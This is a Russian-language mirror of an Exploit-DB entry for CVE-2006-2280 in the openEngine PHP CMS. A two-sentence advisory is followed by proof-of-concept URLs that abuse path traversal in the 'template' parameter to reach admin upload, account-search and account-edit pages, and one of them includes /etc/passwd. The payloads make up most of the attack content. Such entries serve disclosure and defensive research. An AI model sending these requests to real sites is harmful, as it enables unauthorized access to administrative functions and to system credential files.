- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 27823
- Проверка EDB
-
- Пройдено
- Автор
- [email protected]
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2006-2280
- Дата публикации
- 2006-05-08
Код:
source: https://www.securityfocus.com/bid/17871/info
openEngine is prone to an unauthorized-access vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit this issue to access privileged and potentially sensitive information. This may aid in other attacks.
http://www.example.com/cmspath/website.php?template=../system/03_admin/edit/upload&site_pool=/
http://www.example.com/cmspath/website.php?template=../system/03_admin/edit/individual&include=/etc/passwd
http://www.example.com/cmspath/website.php?template=../system/admin/accounts&action2=searchaccounts&accounts_group=2
http://www.example.com/cmspath/website.php?template=../system/admin/accounts&action2=searchaccounts&accounts_group=2&action=editaccount&accounts_lastname=&accounts_email=&accounts_group=2&account_key=<account_key>- Источник
- www.exploit-db.com
